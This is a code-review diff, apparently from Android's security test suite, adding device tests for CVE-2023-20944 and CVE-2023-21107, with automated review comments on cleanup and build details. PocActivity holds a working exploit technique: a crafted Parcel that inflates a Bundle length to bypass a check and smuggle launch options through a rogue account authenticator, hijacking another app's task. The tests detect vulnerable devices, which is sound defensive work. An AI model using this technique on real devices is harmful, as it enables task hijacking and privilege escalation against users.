+ android:exported="true" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java
new file mode 100644
index 0000000..03b7c27
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_target;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class TargetActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.actionTarget), true)
+ .putExtra(getString(R.string.taskId), getTaskId()));
+ } catch (Exception ignored) {
+ // ignoring exceptions here
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..45cb90b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_20944_test">
+ <application>
+ <activity android:name=".PocActivity" />
+ <activity android:name=".HijackActivity" />
+ <service android:name=".PocAuthService"
+ android:exported="false">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_20944_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml
new file mode 100644
index 0000000..c58bc2e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="android.security.cts.CVE_2023_20944_test.account" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java
new file mode 100644
index 0000000..a0c7a241
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.ActivityTaskManager;
+import android.app.IActivityTaskManager;
+import android.app.UiAutomation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.os.ServiceManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private String mPocActivityStatus;
+ private int mTaskId;
+
+ @Test
+ public void testCVE_2023_20944() {
+ try {
+ final int waitMs = 5000;
+ final int waitPerIter = 200;
+ Context context = getInstrumentation().getContext();
+ UiAutomation uiAutomation = getInstrumentation().getUiAutomation();
+ uiAutomation.adoptShellPermissionIdentity();
+
+ // Registering a receiver here to wait for a broadcast from TargetActivity
+ final Semaphore targetReturn = new Semaphore(0);
+ final Semaphore pocReturn = new Semaphore(0);
+ BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if ((intent.getBooleanExtra(context.getString(R.string.actionTarget), false)
+ && (mTaskId = intent.getIntExtra(context.getString(R.string.taskId),
+ -1)) != -1)) {
+ targetReturn.release();
+ }
+ if ((mPocActivityStatus = intent
+ .getStringExtra(context.getString(R.string.status))) != null) {
+ pocReturn.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter = new IntentFilter(context.getString(R.string.bcastActionTarget));
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Start TargetActivity
+ Intent targetIntent = new Intent(Intent.ACTION_MAIN);
+ final String pkgTarget = context.getString(R.string.pkgTarget);
+ targetIntent.setClassName(pkgTarget, context.getString(R.string.activityTarget));
+ targetIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(targetIntent);
+ assumeTrue(context.getString(R.string.targetFailMsg),
+ targetReturn.tryAcquire(waitMs, TimeUnit.MILLISECONDS));
+
+ // Start PocActivity which in turn starts the ChooseTypeAndAccountActivity
+ Intent intent = new Intent(context, PocActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ assumeTrue(context.getString(R.string.pocFailedMsg),
+ pocReturn.tryAcquire(waitMs, TimeUnit.MILLISECONDS));
+ assumeTrue(context.getString(R.string.pocCrashedMsg, mPocActivityStatus),
+ mPocActivityStatus.equals(context.getString(R.string.noExceptionMsg)));
+
+ // Failing the test if the taskId received from the target activity matches with the
+ // list of running taskId and topActivity has HijackActivity in the same taskId.
+ IActivityTaskManager iActivityTaskManager = IActivityTaskManager.Stub
+ .asInterface(ServiceManager.getService(Context.ACTIVITY_TASK_SERVICE));
+ long start = System.currentTimeMillis();
+ while (!(iActivityTaskManager.getAllRootTaskInfos().toString()
+ .contains(HijackActivity.class.getName()))
+ && System.currentTimeMillis() - start < waitMs) {
+ Thread.sleep(waitPerIter);
+ }
+ boolean isDeviceVulnerable = false;
+ List<ActivityTaskManager.RootTaskInfo> runningTasks =
+ iActivityTaskManager.getAllRootTaskInfos();
+ for (ActivityTaskManager.RootTaskInfo runningTaskInfo : runningTasks) {
+ for (int i = 0; i < runningTaskInfo.childTaskIds.length; ++i) {
+ if (mTaskId == runningTaskInfo.childTaskIds[i] && runningTaskInfo.topActivity
+ .getClassName().equals(HijackActivity.class.getName())) {
+ isDeviceVulnerable = true;
+ break;
+ }
+ }
+ }
+ assertFalse(context.getString(R.string.msgFail), isDeviceVulnerable);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
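Review bot: `testCVE_2023_20944` adopts the shell permission identity and registers `broadcastReceiver` but never undoes either, so both outlive the test on every path, including the assumption failures. The CVE-2022-20112 test in this same change scopes the identity with try-with-resources. Here a `finally` containing `context.unregisterReceiver(broadcastReceiver);` and `uiAutomation.dropShellPermissionIdentity();` would do the same, with the two variables hoisted above the `try`. `adoptShellPermissionIdentity()` with no arguments adopts every shell permission; if a narrower set is enough for the task query, passing it explicitly keeps the test's privileges minimal. The `break` in the task scan only leaves the inner loop, which is harmless but makes the outer loop keep running after a match.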
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
index 4416990..921ffcd 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_20944_test;
import android.app.Activity;
-public class PocActivity extends Activity {
+public class HijackActivity extends Activity {
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java
new file mode 100644
index 0000000..a4fb874
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java
@@ -0,0 +1,108 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import android.app.Activity;
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.content.pm.LabeledIntent;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.os.PersistableBundle;
+import android.text.SpannableString;
+import android.text.style.TtsSpan;
+
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ int targetTaskId = getTaskId() - 1;
+ Bundle options = new Bundle();
+ options.putBoolean(getString(R.string.taskOverlay), true);
+ options.putInt(getString(R.string.launchTaskId), targetTaskId);
+ LabeledIntent targetIntent =
+ new LabeledIntent(null, createLabelInjectingOptions(options), 0);
+ targetIntent.addFlags(Intent.FLAG_ACTIVITY_REORDER_TO_FRONT);
+ targetIntent.setClassName(this, HijackActivity.class.getName());
+
+ // Return LabeledIntent from AuthService.addAccount
+ PocAuthService.sAddAccountResponse = new Bundle();
+ PocAuthService.sAddAccountResponse.putParcelable(AccountManager.KEY_INTENT,
+ targetIntent);
+ startActivityForResult(new Intent()
+ .setClassName(getString(R.string.pkgName), getString(R.string.activityName))
+ .putExtra(getString(R.string.allowableAccountTypes),
+ new String[] {getString(R.string.accountType)}),
+ 1);
+ sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.status), getString(R.string.noExceptionMsg)));
+ } catch (Exception e) {
+ try {
+ sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.status), e.getMessage()));
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+
+ }
+ }
+
+ private CharSequence createLabelInjectingOptions(Bundle options) {
+ final int BUNDLE_MAGIC = 0x4C444E42; // 'B' 'N' 'D' 'L', copied from BaseBundle
+ Parcel p = Parcel.obtain();
+
+ p.writeInt(0); // Will hold length
+ p.writeInt(BUNDLE_MAGIC);
+
+ // BEGIN data
+ int startOffset = p.dataPosition();
+ p.writeInt(0); // \0 at end of resultWho
+ p.writeInt(-1); // requestCode
+ p.writeInt(0); // flags
+ p.writeInt(0); // profilerInfo == null
+ p.writeInt(1); // options != null
+ int innerBundleLengthPos = p.dataPosition();
+ p.writeBundle(options);
+ int endOffset = p.dataPosition();
+ // END data
+
+ // Expand inner Bundle to defeat enforceNoDataAvail check
+ p.setDataPosition(innerBundleLengthPos);
+ int innerBundleLength = p.readInt();
+ p.setDataPosition(innerBundleLengthPos);
+
+ // To fully consume the Parcel data and to avoid BadParcelableException, 72 is added in
+ // innerBundleLength
+ p.writeInt(innerBundleLength + 72);
+
+ // Fix PersistableBundle length
+ p.setDataPosition(0);
+ p.writeInt(endOffset - startOffset);
+
+ // Read result as PersistableBundle
+ p.setDataPosition(0);
+ PersistableBundle wrapperBundle = p.readPersistableBundle();
+ p.recycle();
+
+ // Make a CharSequence
+ SpannableString spannableString = new SpannableString(getString(R.string.spannableString));
+ spannableString.setSpan(new TtsSpan("", wrapperBundle), 0, 0, 0);
+ return spannableString;
+ }
+}
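Review bot: In the `catch` block of `onResume`, `e.getMessage()` can be null, and the receiver in DeviceTest releases `pocReturn` only when the `status` extra is non-null. An exception without a message therefore shows up as the generic "pocActivity failed" timeout instead of the crash report. Sending `String.valueOf(e)` instead keeps the exception class in the status string and is never null. Separately, in `createLabelInjectingOptions` the `p.recycle()` call is skipped if `readPersistableBundle()` throws; wrapping the Parcel use in `try { … } finally { p.recycle(); }` covers that.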
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java
new file mode 100644
index 0000000..389ede2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.NetworkErrorException;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+
+// Authenticator returning {@link #addAccountResponse} when addAccount operation is requested
+
+public class PocAuthService extends Service {
+ static Bundle sAddAccountResponse;
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new PocAuthenticator(this).getIBinder();
+ }
+
+ private static class PocAuthenticator extends AbstractAccountAuthenticator {
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
+ String authTokenType, String[] requiredFeatures, Bundle options)
+ throws NetworkErrorException {
+ return sAddAccountResponse;
+ }
+
+ PocAuthenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account,
+ Bundle options) throws NetworkErrorException {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account,
+ String authTokenType, Bundle options) throws NetworkErrorException {
+ return null;
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account,
+ String authTokenType, Bundle options) throws NetworkErrorException {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account,
+ String[] features) throws NetworkErrorException {
+ return null;
+ }
+ }
+}
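Review bot: The comment above `PocAuthService` refers to `{@link #addAccountResponse}`, but the field is named `sAddAccountResponse`, and in a `//` line comment the `{@link}` tag is never processed. Suggest replacing it with `/** Authenticator service whose addAccount() returns {@link #sAddAccountResponse}. */` directly above the class declaration. `sAddAccountResponse` is written by PocActivity and read in `addAccount`, which presumably runs on a different (binder) thread; declaring it `volatile` would make that hand-off explicit.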
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp
new file mode 100644
index 0000000..81c0f02
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21107-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java"
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "sts-device-util",
+ "compatibility-device-util-axt",
+ ],
+ platform_apis: true,
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21107-helper",
+ test_suites: [
+ "sts",
+ ],
+ manifest: "helper-app/AndroidManifest.xml",
+ sdk_version: "current",
+}
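Review bot: The `CVE-2023-21107-helper` module lists no `srcs`, although this change adds `TestListener.java` under helper-app/src and the helper manifest declares `.TestListener` as a service. As written the class is presumably not compiled into the helper APK, so the manifest would name a component with no backing class. If the test only needs the declared component name, a comment in the module should say so; otherwise add `srcs: ["helper-app/src/**/*.java"],`. The helper also omits the `cts_support_defaults` that the test module uses, which may be worth aligning.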
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..d2f0333
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21107_helper">
+ <application>
+ <service android:name=".TestListener"
+ android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" />
+ </application>
+</manifest>
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
similarity index 70%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
index 4416990..860a5ca 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21107_helper;
-import android.app.Activity;
+import android.service.notification.NotificationListenerService;
-public class PocActivity extends Activity {
-}
+public class TestListener extends NotificationListenerService {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..2979d05
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21107_test">
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21107_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java
new file mode 100644
index 0000000..681b4e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java
@@ -0,0 +1,112 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21107_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.UserInfo;
+import android.os.UserHandle;
+import android.os.UserManager;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.UiDevice;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ @Test
+ public void testCVE_2023_21107() {
+ UiAutomation uiAutomation = null;
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ uiAutomation = instrumentation.getUiAutomation();
+
+ UserHandle workUserHandle = null;
+ uiAutomation.adoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS);
+ for (UserInfo info : context.getSystemService(UserManager.class).getUsers()) {
+ if (info.toString().contains("CVE_2023_21107_TestUser")) {
+ workUserHandle = info.getUserHandle();
+ break;
+ }
+ }
+ assumeNotNull(workUserHandle);
+
+ // NotificationAccessDetailsActivity should not launch for another
+ // user id without android.permission.INTERACT_ACROSS_USERS_FULL
+ Intent intent = new Intent(Settings.ACTION_NOTIFICATION_LISTENER_DETAIL_SETTINGS);
+ String helperAppPackage = "android.security.cts.CVE_2023_21107_helper";
+ intent.putExtra(
+ Settings.EXTRA_NOTIFICATION_LISTENER_COMPONENT_NAME,
+ helperAppPackage + "/" + helperAppPackage + ".TestListener");
+ intent.putExtra(Intent.EXTRA_USER_HANDLE, workUserHandle);
+ context.startActivity(intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Test fails if NotificationAccessDetailsActivity is launched
+ assertFalse(
+ "Vulnerable to b/259385017",
+ checkActivityLaunched(UiDevice.getInstance(instrumentation)));
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiAutomation.dropShellPermissionIdentity();
+ } catch (Exception ignored) {
+ // Ignore all exceptiions
+ }
+ }
+ }
+
+ private boolean checkActivityLaunched(final UiDevice device) throws Exception {
+ final Pattern resumedPattern = Pattern.compile("mResumed=(?<value>(true|false))");
+ return poll(
+ () -> {
+ try {
+ String dumpsys =
+ device.executeShellCommand(
+ String.format(
+ "dumpsys activity "
+ + "NotificationAccessDetailsActivity"));
+ Matcher matcher = resumedPattern.matcher(dumpsys);
+ if (matcher.find() && matcher.group("value").equals("true")) {
+ return true;
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ return false;
+ },
+ 1_000L /* pollingTime */,
+ 5_000L /* maxPollingTime */);
+ }
+}
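Review bot: In `checkActivityLaunched`, `matcher.find()` is called once, so only the first `mResumed=` entry in the `dumpsys activity NotificationAccessDetailsActivity` output is examined. If the dump ever lists more than one matching record and the first is not resumed, a launched activity is missed and the test passes on a device it should flag. Because a pass here is only the absence of a signal within the 5 s poll, I would scan every match: `while (matcher.find()) { if ("true".equals(matcher.group("value"))) return true; }`. The `String.format(...)` wrapper has no format arguments and can be dropped. Separately, the `finally` block calls `uiAutomation.dropShellPermissionIdentity()` while `uiAutomation` can still be null if `getInstrumentation()` threw; the catch-all hides the resulting NullPointerException, so an explicit null check would state the intent better.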
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
index 2318fa6..1fca492 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
@@ -16,6 +16,9 @@
-->
<resources>
+ <string name="bucketValueChangeFailMessage">Unable to set standby bucket value!!</string>
<string name="helperAppPackage">android.security.cts.CVE_2023_21128_helper</string>
+ <string name="protectedPackageFailMessage">App not added in admin protected packages list
+ </string>
<string name="testFailMessage">Vulnerable to b/272042183</string>
</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
index 755aaae..c033c7d 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
@@ -16,13 +16,17 @@
package android.security.cts.CVE_2023_21128_test;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_ACTIVE;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_EXEMPTED;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_NEVER;
+
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
import static org.junit.Assert.assertFalse;
import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
import android.app.admin.DevicePolicyManager;
-import android.app.usage.UsageStatsManager;
import android.content.ComponentName;
import android.content.Context;
